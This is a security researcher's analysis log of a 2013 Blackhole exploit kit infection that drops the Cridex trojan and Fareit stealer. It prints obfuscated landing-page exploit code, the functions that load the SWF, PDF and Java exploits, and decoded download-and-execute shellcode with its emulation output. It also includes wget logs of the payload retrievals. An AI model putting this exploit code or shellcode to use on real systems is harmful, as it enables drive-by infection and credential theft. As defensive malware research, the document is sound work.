Infection of Cridex Trojan dropping Fareit Credential Stealer 2013 Jan 14th Virus Total: [Payload] [Landing Page] [SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day] Exploit Infector Code Screenshot Pictures: [SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day] Sample Download--->>[MEDIAFIRE] Guide & Log: (I'm sorry for using texts as report.. Lack of time)#MalwareMustDie!======================================================= #MalwareMustDie - Infection of Blackhole EK via Spam Landing page: IP:,, A guide to flush the Blackhole Payload & Infectors... @unixfreaxjp /malware]$ date Tue Jan 15 23:05:49 JST 2013 ======================================================= Infector urls... h00p:// h00p:// h00p:// //All of the dirty stuff's download urls result: PD-079 : h00p:// jar : h00p:// payload : h00p:// swf1 : h00p:// swf2 : h00p:// pdf1 : h00p:// pdf2 : h00p:// //infector page access... --20:26:45-- h00p:// => `letter.htm' Resolving seconds 0.00, Caching => Connecting to||:80... seconds 0.00, connected. : GET /letter.htm HTTP/1.0 User-Agent: MalwareMustDie Rocks Blackhole Again! Host: : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Tue, 15 Jan 2013 11:26:45 GMT Server: Apache Last-Modified: Tue, 15 Jan 2013 11:14:17 GMT ETag: "4f03efb-1a9-4d351dcda592d" Accept-Ranges: bytes Content-Length: 425 Vary: Accept-Encoding Keep-Alive: timeout=10, max=30 Connection: Keep-Alive Content-Type: text/html : 200 OK Length: 425 [text/html] "20:26:47 (11.89 MB/s) - letter.htm saved [425/425]" // was having this codes... <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Please wait</title> </head> <body> <h2><b>Please wait a moment ... You will be forwarded. </h2></b> <h5>Internet Explorer and Mozilla Firefox compatible only</h5><br> <script> var1=49; var2=var1; if(var1==var2) {document.location="h00p://";} </script> </body> </html> ----------------------------------------------------------- " // forward you to the landing page of BHEK.... " --20:28:05-- h00p:// => `column.php Resolving seconds 0.00,,, Caching => Connecting to||:8080... seconds 0.00, connected. : GET /forum/links/column.php HTTP/1.0 User-Agent: MalwareMustDie Rocks Blackhole Again! Host: : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Tue, 15 Jan 2013 11:28:04 GMT Content-Type: text/html; charset=CP-1251 Connection: close X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding : 200 OK Length: unspecified [text/html] "20:28:07 (69.85 KB/s) - column.php saved [117566]"A new obfuscation BHEK landing page.. first time to see this :<html><head><title></title></head><body> <applet code="hw" archive="/forum/links/column.php?cabimab=lij&y.. <param name="val" value="Dyy3OjjMeqV0el8toqV.. <param value="" name="prime" <script>function c(){if(window.document)s+=String.fromCharCode(a.. var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:.. !6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!.. 98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:6.. 3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!0.. :48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:.. :!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!.. 0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!.. : ...73:!!0:!02:!!!:46:!06:97:!!4:34:4!:59"; a=a.replace(/!/g,1)[sp](":"); for(i=0,s="";i<a.length;i++){ c(); } z=true; try{document.createElement("span");}catch(q){z=false;} if(window.document)if(z)e(s); </script></body></html>Landing page structure:: // applet <applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe"> <param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/> <param value="" name="prime" /> </applet> : // first script function c() { if(window.document)s+=String.fromCharCode(a「i」); } e=eval; sp="split"; // soon followed by second script+obfuscation data: var a = "!!8:97:!!4:32:80:!08:!!.....:97:!!4:34:4!:59"; // generator.. a=a.replace(/!/g,1)[sp](":"); for(i=0,s="";i<a.length;i++) { c(); } z=true; try { document.createElement("span"); } catch(q) { z=false; } if(window.document)if(z)e(s);The summary of the infection method used in this landing page.// From this landing page we will get infections as follows: "1. The HTML landing page applet will infect you with - // - first infection of jar (it has the 0day java jar here..)" <applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe"> <param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/> <param value="" name="prime" /></applet> "2. The obfuscation landing page will infect you: // flash/swf SWF1 exploit....." function getCN() { return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" } "//pdf1" function p1(){ var d = document.createElement("object"); d.setAttribute("data", "/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x( "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + x(pdfver.join("."))); d.setAttribute("type", "application/pdf"); document.body.appendChild(d);} "//pdf2" function p2(){ var d = document.createElement("object"); d.setAttribute("data", "/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x( "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + x(pdfver.join("."))); d.setAttribute("type", "application/pdf"); document.body.appendChild(d); } "//flash/swf SWF2 exploit...." function ff2(){ var oSpan = document.createElement("span"); var url = "/forum/links/column.php?jkmflr=" + x("c833f") + "&boqrjhrc=" + x("nyjy") + "&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp"; oSpan.innerHTML = " <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'> <param name='movie' value='" + url + "' /> <param name='allowScriptAccess' value='always' /> <param name='Play' value='0' /> <embed src='" + url + "' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'> </embed></object> "; document.body.appendChild(oSpan); } "// a shellcode (to be called by other exploitor as key of payload)" function getShellCode(){ var a = "8200!%4482!%e551!%e034!%5164!%f474!...!%1414!%".split(""). reverse().join(""); return a["replace"](/\%!/g, "%" + "u") } "// and a jar component to detect your java version" $$["onDetec" + "tionDone"]("Ja" + "va", svwrbew6436b, "../data/getJavaInfo.jar");Shellcode & Payload:"// change the code into below & see the result of the burped shellcode:" var a = "8200!%4482!...!%1414!%".split("").reverse().join(""); var xxx=a["replace"](/\%!/g, "%" + "u"); document.write(xxx); "// output :" %u4141%u4141%u8366%ufce4%uebfc%u581O%uc931%u8166%uO9e9%u8Ofe%u283O%ue24O%uebfa%ue8O5%uffeb%uffff%uccad %u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u2O5e%uf31b%ua34e%u1476%u5c2b%uO41b%uc6a9%u383d %ud7d7%ua39O%u1868%u6eeb%u2e11%ud35d%u1caf%uadOc%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b5O%u7edd %u5ea3%u2bO8%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda1O%u2O5c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d %ua376%uOc76%uf52b%ua34e%u6324%u6ea5%ud7c4%uOc7c%ua324%u2bfO%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385 %uO84O%u55a8%u1b24%u2b5c%uc3be%ua3db%u2O4O%udfa3%u2d42%ucO71%ud7bO%ud7d7%ud1ca%u28cO%u2828%u7O28%u4278 %u4O68%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u474O%u2846%u4O28%u5a5d%u4544%ud77c %uab3e%u2Oec%ucOa3%u49cO%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%uOc74%uef24%uOc2c%u4d5a%u5b4f%u6cef %u2cOc%u5a5e%u1a1b%u6cef%u2OOc%uO5O8%uO85b%u4O7b%u28dO%u2828%u7ed7%ua324%u1bcO%u79e1%u6cef%u2835%u585f %u5c4a%u6cef%u2d35%u4cO6%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6caO%u2c35%u7969%u2842%u2842%u7f7b%u2842 %u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28 %u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u2O7e%ub4cO%ud7d6%ua6d7%u2666%ubOc4%ua2d6%ua126%u2947%u1b95%ua2e2 %u3373%u6eee%u1e51%uO732%u4O58%u5c5c%u1258%uO7O7%u4d4c%u4943%u4d45%u415a%u4647%u4943%u5aO6%u125d%u181O %u181O%u4eO7%u5a47%u455d%u44O7%u4641%u5b43%u4bO7%u4447%u455d%uO646%u4O58%u1758%u4e4f%u1b15%u1218%u4619 %u1912%u1241%u4119%u1b12%uOe1b%u4d47%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243 %u191b%u1912%u1242%u4719%u49Oe%u1915%uOe43%u474f%u4615%u43Oe%u155e%u2844%uOO28 -------------------------------------------------------------------------------- "// #Tips if you want to use libemu to crack this I made the below format for you.." import pylibemu shellcode = b"\x41\x41\x41\x41\x83\x66\xfc\xe4\xeb\xfc\x58\x1O\xc9\x31\x81\x66\xO9\xe9\x8O\xfe\x28\x3O\xe2\x4O\xeb\xfa\xe8\xO5\xff\xeb" shellcode += b"\xff\xff\xcc\xad\x1c\x5d\x77\xc1\xe8\x1b\xa3\x4c\x18\x68\x68\xa3\xa3\x24\x34\x58\xa3\x7e\x2O\x5e\xf3\x1b\xa3\x4e\x14\x76" shellcode += b"\x5c\x2b\xO4\x1b\xc6\xa9\x38\x3d\xd7\xd7\xa3\x9O\x18\x68\x6e\xeb\x2e\x11\xd3\x5d\x1c\xaf\xad\xOc\x5d\xcc\xc1\x79\x64\xc3" shellcode += b"\x7e\x79\x5d\xa3\xa3\x14\x1d\x5c\x2b\x5O\x7e\xdd\x5e\xa3\x2b\xO8\x1b\xdd\x61\xe1\xd4\x69\x2b\x85\x1b\xed\x27\xf3\x38\x96" shellcode += b"\xda\x1O\x2O\x5c\xe3\xe9\x2b\x25\x68\xf2\xd9\xc3\x37\x13\xce\x5d\xa3\x76\xOc\x76\xf5\x2b\xa3\x4e\x63\x24\x6e\xa5\xd7\xc4" shellcode += b"\xOc\x7c\xa3\x24\x2b\xfO\xa3\xf5\xa3\x2c\xed\x2b\x76\x83\xeb\x71\x7b\xc3\xa3\x85\xO8\x4O\x55\xa8\x1b\x24\x2b\x5c\xc3\xbe" shellcode += b"\xa3\xdb\x2O\x4O\xdf\xa3\x2d\x42\xcO\x71\xd7\xbO\xd7\xd7\xd1\xca\x28\xcO\x28\x28\x7O\x28\x42\x78\x4O\x68\x28\xd7\x28\x28" shellcode += b"\xab\x78\x31\xe8\x7d\x78\xc4\xa3\x76\xa3\xab\x38\x2d\xeb\xcb\xd7\x47\x4O\x28\x46\x4O\x28\x5a\x5d\x45\x44\xd7\x7c\xab\x3e" shellcode += b"\x2O\xec\xcO\xa3\x49\xcO\xd7\xd7\xc3\xd7\xc3\x2a\xa9\x5a\x2c\xc4\x28\x29\xa5\x28\xOc\x74\xef\x24\xOc\x2c\x4d\x5a\x5b\x4f" shellcode += b"\x6c\xef\x2c\xOc\x5a\x5e\x1a\x1b\x6c\xef\x2O\xOc\xO5\xO8\xO8\x5b\x4O\x7b\x28\xdO\x28\x28\x7e\xd7\xa3\x24\x1b\xcO\x79\xe1" shellcode += b"\x6c\xef\x28\x35\x58\x5f\x5c\x4a\x6c\xef\x2d\x35\x4c\xO6\x44\x44\x6c\xee\x21\x35\x71\x28\xe9\xa2\x18\x2c\x6c\xaO\x2c\x35" shellcode += b"\x79\x69\x28\x42\x28\x42\x7f\x7b\x28\x42\x7e\xd7\xad\x3c\x5d\xe8\x42\x3e\x7b\x28\x7e\xd7\x42\x2c\xab\x28\x24\xc3\xd7\x7b" shellcode += b"\x2c\x7e\xeb\xab\xc3\x24\xc3\x2a\x6f\x3b\x17\xa8\x5d\x28\x6f\xd2\x17\xa8\x5d\x28\x42\xec\x42\x28\xd7\xd6\x2O\x7e\xb4\xcO" shellcode += b"\xd7\xd6\xa6\xd7\x26\x66\xbO\xc4\xa2\xd6\xa1\x26\x29\x47\x1b\x95\xa2\xe2\x33\x73\x6e\xee\x1e\x51\xO7\x32\x4O\x58\x5c\x5c" shellcode += b"\x12\x58\xO7\xO7\x4d\x4c\x49\x43\x4d\x45\x41\x5a\x46\x47\x49\x43\x5a\xO6\x12\x5d\x18\x1O\x18\x1O\x4e\xO7\x5a\x47\x45\x5d" shellcode += b"\x44\xO7\x46\x41\x5b\x43\x4b\xO7\x44\x47\x45\x5d\xO6\x46\x4O\x58\x17\x58\x4e\x4f\x1b\x15\x12\x18\x46\x19\x19\x12\x12\x41" shellcode += b"\x41\x19\x1b\x12\xOe\x1b\x4d\x47\x1a\x15\x12\x5e\x43\x19\x19\x12\x12\x45\x1a\x1b\x1b\x12\x12\x1b\x43\x19\x19\x12\x12\x43" shellcode += b"\x19\x1b\x19\x12\x12\x42\x47\x19\x49\xOe\x19\x15\xOe\x43\x47\x4f\x46\x15\x43\xOe\x15\x5e\x28\x44\xOO\x28" emulator = pylibemu.Emulator() offset = emulator.shellcode_getpc_test(shellcode) offset emulator.prepare(shellcode, offset) emulator.test() print emulator.emu_profile_output " ---------------------------------------------------------------------------- // my way is... // sav the binary and disassembly it.. ----------------------------------------------------------------------------" 41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81 AAAAf......X1.f. e9 O9 fe 8O 3O 28 4O e2 fa eb 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12 19 47 Oe 49 15 19 43 Oe 4f 47 15 46 ..B..G.I..C.OG.F Oe 43 5e 15 44 28 28 OO .C^.D((. -------------------------------------------------------------------" // see the payload url below in the 0x1a494bbe at urlmon? ↓ " 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255) 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon) 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0) " //payload is here.. " h00p:// " //download... " --21:33:38-- h00p:// => `column.php@gf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&a=1k&go=n&kv=l Resolving seconds 0.00,,, Caching => Connecting to||:8080... seconds 0.00, connected. : " GET /forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l HTTP/1.0 " User-Agent: MalwareMustDie Rocks Blackhole Again! Host: : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Tue, 15 Jan 2013 12:33:36 GMT Content-Type: application/x-msdownload Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Pragma: public Expires: Tue, 15 Jan 2013 12:33:37 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private " Content-Disposition: attachment; filename=calc.exe" Content-Transfer-Encoding: binary Content-Length: 140288 200 OK " Length: 140,288 (137K) [application/x-msdownload] 100%[====================================>] 140,288 64.83K/s 21:33:42 (64.73 KB/s) - `calc.exe' saved [140288/140288] "Getting infector components: // let's get the SWF1... // I prefer to check the obfuscated link in below function: function getCN(){ return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" } // it is using function x, so let's use it too to decode values of url string.. function x(s){ d = []; for (i = 0; i < s.length; i ++ ){ k = (s.charCodeAt(i)).toString(33); d.push(k);} ; return d.join(":");} var xxx= "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy"; document.write(xxx); // result: /forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy //download it... h00p:// GET /forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy HTTP/1.0 User-Agent: MalwareMustDie Rocks Blackhole Again! Host: Connection: Keep-Alive : HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Tue, 15 Jan 2013 12:50:12 GMT Content-Type: text/html; charset=CP-1251 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 7238 200 OK Registered socket 1896 for persistent reuse. Length: 7,238 (7.1K) [text/html] 100%[====================================>] 7,238 22.73K/s // Get the SWF2 Infector,.. // same method... h00p:// HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Tue, 15 Jan 2013 12:51:12 GMT Content-Type: text/html; charset=CP-1251 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 946 : 200 OK Registered socket 1896 for persistent reuse. Length: 946 [text/html] 100%[====================================>] 946 --.--K/s 21:51:14 (26.47 MB/s) - "column.php@jkmflr=30%3A1n%3A1i%3A1i%3A33&boqrjhrc=3b%3A3m%3A37%3A3m&rshcr=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jfwxwr=gcp" saved [946/946] // Get the PDF 1 & 2 infectors..., w/ understanding value of x(pdfver.join("."))= "1k:1d:1f:1d:1g:1d:1f" /forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x( "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + "1k:1d:1f:1d:1g:1d:1f" /forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x( "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + "1k:1d:1f:1d:1g:1d:1f" ↓ h00p:// h00p:// // shortly, the download logs.. : HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Tue, 15 Jan 2013 13:05:17 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Content-Length: 21575 ETag: "18f8a6bcd64232c6eeead1d0a2c5cd62" Last-Modified: Tue, 15 Jan 2013 13:05:17 GMT Accept-Ranges: bytes 200 OK Registered socket 1896 for persistent reuse. Length: 21,575 (21K) [application/pdf] 100%[====================================>] 21,575 40.09K/s : HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Tue, 15 Jan 2013 13:05:58 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Accept-Ranges: bytes Content-Length: 9781 Content-Disposition: inline; filename=b76cb.pdf 200 OK Registered socket 1896 for persistent reuse. Length: 9,781 (9.6K) [application/pdf] 100%[====================================>] 9,781 59.75K/s // And the JAR... // see the applet url... <applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe"> <param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/> <param value="" name="prime" /></applet> : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Tue, 15 Jan 2013 13:32:09 GMT Content-Type: text/html; charset=CP-1251 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 : 200 OK Registered socket 1896 for persistent reuse. Length: 20 [text/html] 100%[====================================>] 20 --.--K/s 22:27:08 (659.56 KB/s) - `column.php@cabimab=lij&ymwbck=rpe.2' saved [20/20] // hmm.. the jar looks failed.. :-( Let's re-set the "request" : // retry - try1 (old java version) --16:24:19-- => "column.php@cabimab=lij&ymwbck=rpe" Resolving seconds 0.00,,, Caching => Connecting to||:8080... seconds 0.00, connected. : GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0 User-Agent: MalwareMustDie! Host: : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Wed, 16 Jan 2013 07:24:15 GMT Content-Type: application/java-archive Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Content-Length: 16786 ETag: "e3ffc7e6bc6f654d51dd5bb7658ae853" Last-Modified: Wed, 16 Jan 2013 07:24:16 GMT Accept-Ranges: bytes : 200 OK Registered socket 1896 for persistent reuse. Length: 16,786 (16K) [application/java-archive] "16:24:21 (26.42 KB/s) - `try1.jar' saved [16786/16786]" // retry - try2 (newer java version) --17:06:01-- => "column.php@cabimab=lij&ymwbck=rpe" Resolving seconds 0.00,,, Caching => Connecting to||:8080... seconds 0.00, connected. Created socket 1896. Releasing 0x003d5b20 (new refcount 1). : GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0 User-Agent: MalwareMustDie! Host: : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Wed, 16 Jan 2013 08:11:06 GMT Content-Type: application/java-archive Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Content-Length: 22600 ETag: "2af29d21c006b5c106bd7760f19a2bf5" Last-Modified: Wed, 16 Jan 2013 08:05:58 GMT Accept-Ranges: bytes : 200 OK Registered socket 1896 for persistent reuse. Length: 22,600 (22K) [application/java-archive] "17:06:03 (42.76 KB/s) - `try2.jar' saved [22600/22600]" // two jars was downloaded successfully bash-2.02$ date Tue Jan 15 23:14:51 2013 2013/01/16 16:24 16,786 tri1.jar 2013/01/16 17:05 22,600 try2.jar 2 File(s) 39,386 bytes tri1.jar e3ffc7e6bc6f654d51dd5bb7658ae853 try2.jar 2af29d21c006b5c106bd7760f19a2bf5 :
A Guide to flush infectors & payload at BHEK Infection on
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